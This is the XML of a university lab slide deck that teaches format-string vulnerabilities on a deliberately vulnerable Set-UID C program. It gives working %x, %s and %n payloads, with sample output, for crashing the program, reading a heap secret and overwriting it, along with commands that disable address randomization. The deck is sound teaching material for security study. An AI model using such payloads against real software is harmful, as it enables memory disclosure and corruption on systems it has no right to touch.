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</p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Proxima Nova" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId75"/>
      <p:bold r:id="rId76"/>
      <p:italic r:id="rId77"/>
      <p:boldItalic r:id="rId78"/>
    </p:embeddedFon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Consolas" panose="020B0609020204030204" pitchFamily="49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01524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Format String Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="3600" dirty="0"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26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Created by: Kevin Du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Updated: Chetan Jaiswal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id=100, age=25; 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char *name = "Bob Smith";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Name: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Age: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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>→ printf() needs to access id, name, and age to print format string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id=100, age=25;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char *name = "Bob Smith";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printf("\n ID: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Name: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Age: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\n",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 - Two Pointers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id=100, age=25;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char *name = "Bob Smith";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printf("\n ID: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Name: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Age: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\n",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25625" y="1191875"/>
            <a:ext cx="3000000" cy="15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Calibri"/>
              <a:buChar char="❖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String Pointer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scans format string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Calibri"/>
              <a:buChar char="❖"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 Pointer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moves along stack to access arguments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 - Two Pointers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id=100, age=25;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char *name = "Bob Smith";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printf("\n ID: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Name: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Age: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\n", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720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114800" lvl="0" indent="-6985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24" y="1349825"/>
            <a:ext cx="2678875" cy="32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27300" y="4413100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33325" y="2336650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 - Pointer Movement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25" y="1208306"/>
            <a:ext cx="2930924" cy="3529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475" y="1109649"/>
            <a:ext cx="2863349" cy="38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78525" y="4568875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733900" y="4536050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32825" y="2297625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176000" y="2239275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Argument Access - Pointer Movement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75" y="1152474"/>
            <a:ext cx="2764025" cy="375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175" y="1067838"/>
            <a:ext cx="2877525" cy="38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2107325" y="4420575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795375" y="4420575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87450" y="1930775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097950" y="1630500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printf() - Missing Arguments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%d, Name: %s, Age: %d\n", id, name);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Age missing !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- Missing Arguments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%d, Name: %s, Age: %d\n", id, name);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Age missing !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875" y="1781875"/>
            <a:ext cx="5206675" cy="26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243025" y="3827400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500650" y="2360050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- Format String Vulnerability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%d, Name: %s, Age: %d\n", id, name); // Age missing !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b="1"/>
              <a:t>Risky Pattern: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printf(user_input);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875" y="1781875"/>
            <a:ext cx="5206675" cy="26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243025" y="3827400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500650" y="2360050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- Format String Vulnerability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%d, Name: %s, Age: %d\n", id, name); // Age missing !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b="1"/>
              <a:t>Risky Pattern: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printf(user_input);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Input can contain conversion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specifiers e.g. %d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875" y="1781875"/>
            <a:ext cx="5206675" cy="26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500650" y="2360050"/>
            <a:ext cx="7920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Argument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Pointer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243025" y="3827400"/>
            <a:ext cx="1490700" cy="20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Format String Pointer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052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❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>printf() function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➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>Variable arguments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➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>Argument access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❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>Format String Vulnerability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❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>Tasks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➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>Crash vulnerable program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00000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>Read secret from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerable program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-330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Char char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify secret in vulnerable program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Vulnerable Program Snippet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SECRET1 0x44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SECRET2 0x55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char user_input[100];   int *secret;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 = (int *) malloc(2*sizeof(int));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secret[0] = SECRET1; secret[1] = SECRET2;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printf("Please enter a string\n");  scanf("%s", user_input);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printf(user_input);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85650"/>
            <a:ext cx="1525900" cy="1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Vulnerable Program Snippet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SECRET1 0x44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SECRET2 0x55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char user_input[100];   int *secret;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 = (int *) malloc(2*sizeof(int));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Two secrets on heap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secret[0] = SECRET1; secret[1] = SECRET2;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printf("Please enter a string\n");  scanf("%s", user_input);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printf(user_input);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85650"/>
            <a:ext cx="1525900" cy="1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Vulnerable Program Snippet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SECRET1 0x44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SECRET2 0x55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char user_input[100];   int *secret;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 = (int *) malloc(2*sizeof(int));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Two secrets on heap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secret[0] = SECRET1; secret[1] = SECRET2;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printf("Please enter a string\n");  scanf("%s", user_input);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Get user input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printf(user_input);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85650"/>
            <a:ext cx="1525900" cy="1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Vulnerable Program Snippet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SECRET1 0x44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#define SECRET2 0x55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	char user_input[100];   int *secret;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 = (int *) malloc(2*sizeof(int));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Two secrets on heap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secret[0] = SECRET1; secret[1] = SECRET2;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printf("Please enter a string\n");  scanf("%s", user_input);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Get user input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printf(user_input);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Format String Vulnerability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endParaRPr sz="14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600" y="285650"/>
            <a:ext cx="1525900" cy="1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Vulnerable Program Snippet - Stack Layout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1700" y="1163825"/>
            <a:ext cx="2982000" cy="6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main() variables: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user_input[100];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*secret;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11700" y="1926875"/>
            <a:ext cx="2982000" cy="6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printf() variables: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har char="●"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*format_string;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5" name="Shape 235" descr="Snippet_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449" y="1017725"/>
            <a:ext cx="5045400" cy="35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 Vulnerable Program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// Compile vulnerable program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gcc vul_prog.c -o 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400" b="1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// Change program to Set-UID root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sudo chown root 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sudo chmod 4755 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Keep Address Randomization on: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sudo sysctl -w kernel.randomize_va_space=2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Run Vulnerable Program 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500"/>
              <a:t>Input:</a:t>
            </a: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500"/>
              <a:t>Input with no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conversion specifier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500"/>
              <a:t>Input containing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conversion specifier (%x)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="248" name="Shape 248" descr="Vulnerable_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025" y="691750"/>
            <a:ext cx="4673875" cy="4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Run Vulnerable Program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// Input with no conversion specifier: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$./vul_prog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Please enter decimal integer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Please enter a string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hello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// Input with conversion specifier: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$./vul_prog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Please enter decimal integer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Please enter a string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%x.%x.%x.%x.%x.%x.%x.%x.%x.%x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="256" name="Shape 256" descr="Vulnerable_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75" y="1017725"/>
            <a:ext cx="4119874" cy="3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Run Vulnerable Program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// Input with no conversion specifier:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="-69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$./vul_prog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Please enter decimal integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="-69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Please enter a string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hello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// Input with conversion specifier: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$./vul_prog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Please enter decimal integer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Please enter a string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%x.%x.%x.%x.%x.%x.%x.%x.%x.%x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→ Prints data on stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="264" name="Shape 264" descr="Vulnerable_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75" y="1017725"/>
            <a:ext cx="4119874" cy="3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Crash the program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Print secret value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Modify secret value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975" y="358075"/>
            <a:ext cx="1430275" cy="14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printf() function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Function used by C programs to write a string to the standard output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="45720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int printf(const char *format, ...);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330200">
              <a:lnSpc>
                <a:spcPct val="20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Accepts variable number of arguments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Crash Program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Calibri"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Similar to series of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lang="en" sz="1600"/>
              <a:t>, input can contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>series of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ct val="114285"/>
              <a:buChar char="❖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600"/>
              <a:t> prints string pointed by address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When using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600"/>
              <a:t> to fetch value, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address may be invalid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Program will crash trying to access an invalid address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175" y="191075"/>
            <a:ext cx="1948150" cy="14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Crash Program - Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Shape 286" descr="Vulnerable_Cr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49" y="1074449"/>
            <a:ext cx="4438312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3900" y="191075"/>
            <a:ext cx="1696424" cy="12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Crash Program - Provide Input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address is 0xbffff2f0 (on stack)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value is 0x 804b008 (on heap)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secret[0]'s address is 0x 804b008 (on heap)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secret[1]'s address is 0x 804b00c (on heap)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%s%s%s%s%s%s%s%s%s%s%s%s%s%s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Segmentation fault (core dumped)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Crash Program - Provide Input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address is 0xbffff2f0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value is 0x 804b008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secret[0]'s address is 0x 804b008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secret[1]'s address is 0x 804b00c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%s%s%s%s%s%s%s%s%s%s%s%s%s%s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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Segmentation fault (core dumped)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← Crash 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Two secrets on heap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Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print the second secret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/>
              <a:t>secret[1] in array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306" name="Shape 306" descr="Vulnerable Stack - Print Secr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974" y="742100"/>
            <a:ext cx="4680274" cy="41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Print secret using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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Challenges: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" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find secret’s address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(printed by program)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" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Put address on stack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(via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>integer input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Move pointers (via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%x input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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14" name="Shape 314" descr="Vulnerable Stack - Print Secr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974" y="742100"/>
            <a:ext cx="4680274" cy="41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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4827000" y="2415175"/>
            <a:ext cx="1284300" cy="206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317" name="Shape 317"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317350" y="1842200"/>
            <a:ext cx="303600" cy="1569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318" name="Shape 318"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317350" y="1269225"/>
            <a:ext cx="303600" cy="156900"/>
          </a:xfrm>
          <a:prstGeom prst="rect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Secret - Steps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/>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Randomization is on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Observe distance for integer input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Observe secret[1] address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-3302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Construct input for print secret[1]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6">
            <a:off x="6096800" y="595340"/>
            <a:ext cx="1651200" cy="117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Print Secret - Observe Distance for Integer Input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600"/>
              <a:t>Run the vulnerable program, input a integer value, 123 for example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 ./vul_prog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integer value =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123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> (decimal)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integer value =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0x7b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> (hex)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600"/>
              <a:t>Input the following string, and look for the hex value of the integer you just entered (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0x7b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="45720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%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x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00" y="266825"/>
            <a:ext cx="1030125" cy="1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Secret - Observe Distance for Integer Input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0xbfddd6b0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805c008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805c008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0x 805c00c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%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x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bfddd6b8,1,b767b309,bfddd6df,bfddd6de,0,bfddd7c4,805c008,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7b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,252c7825,78252c78,2c78252c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Observe Distance for Integer Input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0xbfddd6b0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805c008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805c008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0x 805c00c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%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x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bfddd6b8,1,b767b309,bfddd6df,bfddd6de,0,bfddd7c4,805c008,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7b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,252c7825,78252c78,2c78252c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5030575" y="4399775"/>
            <a:ext cx="1752300" cy="3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Distance is 9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="404975" y="4101700"/>
            <a:ext cx="5356200" cy="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612050" y="4151325"/>
            <a:ext cx="702300" cy="29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printf() Example - Variable Arguments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int printf(const char *format, ...);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i=1, j=2, k=3;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printf("Hello World \n");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one number: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two numbers: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three numbers: %d,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j, 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Print Secret - Observe Secret Address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20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Distance = 9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600"/>
              <a:t>Since randomization is on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en" sz="1600"/>
              <a:t>run the vulnerable program again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en" sz="1600"/>
              <a:t>observe the address of secret[1]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 ./vul_prog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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Observe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hex address of secret[1]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Secret - Observe Secret Address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0xbfb0a940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8f9200c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Observe Secret Address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0xbfb0a940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8f9200c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3622425" y="3255975"/>
            <a:ext cx="2376600" cy="3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Secret[1] hex address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="367" name="Shape 367"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3342075" y="2711275"/>
            <a:ext cx="666900" cy="525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Construct Input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600"/>
              <a:t>Integer input will contain address of secret[1] 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➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To input address, need to convert it (hex) to decimal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600"/>
              <a:t>Construct the input, %s should be at the position of "Distance"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en" sz="1600"/>
              <a:t>Integer input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address of secret[1] (decimal)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en" sz="1600"/>
              <a:t>String input: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%x,%x,%x,%x,%x,%x,%x,%x,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Print Secret - Convert Hex Address to Decimal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Use Programming Mode in Calculator</a:t>
            </a:r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125" y="1897787"/>
            <a:ext cx="3076149" cy="2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050" y="1897800"/>
            <a:ext cx="3090849" cy="21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1022200" y="2462975"/>
            <a:ext cx="830100" cy="19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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4527400" y="2462975"/>
            <a:ext cx="830100" cy="19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Provide Input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0xbfb0a940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8f9200c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150544396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%x,%x,%x,%x,%x,%x,%x,%x,%s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bfb0a948,1,b766a309,bfb0a96f,bfb0a96e,0,bfb0aa54,8f92008,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Provide Input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0xbfb0a940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8f92008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8f9200c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150544396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%x,%x,%x,%x,%x,%x,%x,%x,%s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bfb0a948,1,b766a309,bfb0a96f,bfb0a96e,0,bfb0aa54,8f92008,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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5797275" y="4380050"/>
            <a:ext cx="1698900" cy="2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Secret[1] value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="397" name="Shape 397"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5704425" y="4123000"/>
            <a:ext cx="356700" cy="34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Modify Secret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/>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify the secret[1] value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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Distance known = 9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Use of %n instead of %s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/>
              <a:t>String Input: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%x,%x,%x,%x,%x,%x,%x,%x,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Char char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%n writes value at address = number of characters printed so far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49" y="304700"/>
            <a:ext cx="2132799" cy="10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Modify Secret - Provide Input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0xbfa86530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9ac3008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9ac3008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9ac300c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162279436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bfa86538,1,b760f309,bfa8655f,bfa8655e,0,bfa86644,9ac3008,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0x39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Secret - Provide Input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0xbfa86530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9ac3008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9ac3008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9ac300c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162279436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%x,%x,%x,%x,%x,%x,%x,%x,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bfa86538,1,b760f309,bfa8655f,bfa8655e,0,bfa86644,9ac3008,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0x39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4014975" y="4410250"/>
            <a:ext cx="2574900" cy="2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Modified Secret[1] value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="418" name="Shape 418"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3533725" y="4598525"/>
            <a:ext cx="397200" cy="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Example - Variable Arguments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int printf(const char *format, ...);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i=1, j=2, k=3;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printf("Hello World \n");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one number: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two numbers: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three numbers: %d,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j, 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Secret - Control Value Written Using Widths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/>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify the secret[1] value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To control value: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/>
              <a:t>Use width in preceding conversion specifier(s) e.g. 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%&lt;width&gt;x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nsolas"/>
              <a:buChar char="➢"/>
            </a:pP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%&lt;width&gt;x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prints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&lt;width&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>number of characters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Secret - Control Value Written Using Widths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304800" y="895350"/>
            <a:ext cx="8520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dirty="0"/>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify the secret[1] value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/>
              <a:t>Pick Target Value: Example: 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en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (decimal)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t> =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 dirty="0"/>
              <a:t> (hex)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 dirty="0"/>
              <a:t>Construct Input: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 dirty="0"/>
              <a:t>Distance = 9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 dirty="0"/>
              <a:t>8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%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t> can be put before %n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SzPct val="100000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To change value to 80, each %x should print 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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t> → use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%10x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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SzPct val="100000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>String Input to Change secret[1] to 0x50: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="457200" rtl="0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%10x%10x%10x%10x%10x%10x%10x%10x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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Modify Secret - Provide Input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0xbfd7d6f0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8557008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8557008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855700c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139816972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%10x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%10x%10x%10x%10x%10x%10x%10x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bfd7d6f8     	1  b7628309  bfd7d71f  bfd7d71e     	0  bfd7d804   8557008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0x50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 Secret - Provide Input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0xbfd7d6f0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8557008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8557008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855700c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decimal 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139816972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%10x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%10x%10x%10x%10x%10x%10x%10x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bfd7d6f8     	1  b7628309  bfd7d71f  bfd7d71e     	0  bfd7d804   8557008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0x50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4014975" y="4410250"/>
            <a:ext cx="2574900" cy="2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Modified Secret[1] value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="444" name="Shape 444"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3533725" y="4598525"/>
            <a:ext cx="397200" cy="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Vulnerable Program with No Integer Input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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No integer input to place secret address on stack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/>
              <a:t>Difficult if Randomization kept on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SzPct val="100000"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1"/>
              <a:t>secret[1] address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> needs to be part of user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1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Stack Layout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secret[1] address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> needs to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be part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="457" name="Shape 457" descr="Vulnerable Program - No Int In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425" y="1017725"/>
            <a:ext cx="4702318" cy="39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4917650" y="2133775"/>
            <a:ext cx="514500" cy="18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99525" y="2794200"/>
            <a:ext cx="2325900" cy="17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4886600" y="1702525"/>
            <a:ext cx="576600" cy="6483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 Program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// Compile Program to Set-UID root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gcc vul_prog_no_integer.c -o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sudo chown root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sudo chmod 4755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// Disable Address Randomization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sudo sysctl -w kernel.randomize_va_space=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lv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 User Input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Commands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Need to construct user input containing an address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Use combination of bash commands and command substitution to construct input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Construct input using:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> echo $(printf “ “)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/>
              <a:t> - writes its arguments to standard output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- formats and prints data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Command Substitution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Replaces output of command with command itself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Replaces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$(command)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> with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command’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> output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Substitution using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printf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- Example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311700" y="1540525"/>
            <a:ext cx="64452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seed@Client:~$ echo 123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seed@Client:~$ printf "hello world \n"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Substitution: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seed@Client:~$ echo $(date)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Sat May 27 18:56:33 PDT 2017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seed@Client:~$ echo $(printf "hello world \n")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seed@Client:~$ echo $(printf "\x41\x42\x43\x44")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Secret - Steps</a:t>
            </a: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Observe secret[1] address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0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Using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" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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printf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, construct input to: 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Observe distance for secret[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-330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Print secret[1]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Example - Variable Arguments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int printf(const char *format, ...);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i=1, j=2, k=3;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printf("Hello World \n");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one number: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one number: 1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two numbers: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three numbers: %d,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j, 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Observe Address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./vul_prog_no_integer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0xbffff2c4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804b008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804b008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Observe Address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Address contains special character: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0x0A (newline),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(form feed)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0x0D (return), or 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0x20 (space)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Observe Address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Address contains special character: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0x0A (newline),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0x0C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(form feed)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0x0D (return), or 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0x20 (space)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To change the address, please uncomment in program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vul_prog_no_integer.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF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*dummy;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dummy = (int *) malloc(2*sizeof(int));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Print Secret - Observe Address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400"/>
              <a:t>Recompile program as set-UID root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SzPct val="100000"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Observe address again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./vul_prog_no_integer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0xbffff2c0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804b01c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Construct Input to Observe Distance</a:t>
            </a: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 b="1"/>
              <a:t>Construct Input containing secret[1] address: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echo $(printf "\x1c\xb0\x04\x08")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.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x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�.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x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600"/>
              <a:t>Note: Address is specified in reverse due to byte order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Construct Input to Observe Distance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echo $(printf “\x1c\xb0\x04\x08").%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x |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address is 0xbffff2e0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value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secret[0]'s address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804b01c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�.bffff2e8.1.b7eb8309.bffff30f.bffff30e.0.bffff3f4.804b018.804b008.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804b01c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.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
